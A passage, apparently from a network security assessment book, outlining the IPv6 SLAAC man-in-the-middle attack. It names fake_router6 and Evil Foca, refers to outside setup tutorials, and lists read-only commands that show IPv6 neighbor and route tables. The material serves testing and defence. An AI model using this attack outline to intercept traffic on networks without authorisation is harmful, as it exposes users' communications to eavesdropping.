• Configuring a DNS64 server, providing IPv6 responses to IPv4 DNS requests

• IPv6 router advertisement using fake_router6

• Proliferating the DNS64 configuration using DHCPv6

The Evil Foca utility,⁵⁶ which is available for Windows only, automates the attack. To prepare a Kali Linux IPv6 attack platform, review the InfoSec Institute “SLAAC Attack” tutorial,⁵⁷ which provides step-by-step instructions for NAT64, DNS64, DHCPv6, and optional NAT-PT configuration. Jonathan Cran’s slide deck “Practical Man in the Middle”⁵⁸ also details the attack (among others).

ndp -an

netstat -f inet6 -nr

ip -6 neigh

netstat -6nr

netsh interface ipv6 show neighbors

netsh interface ipv6 show routes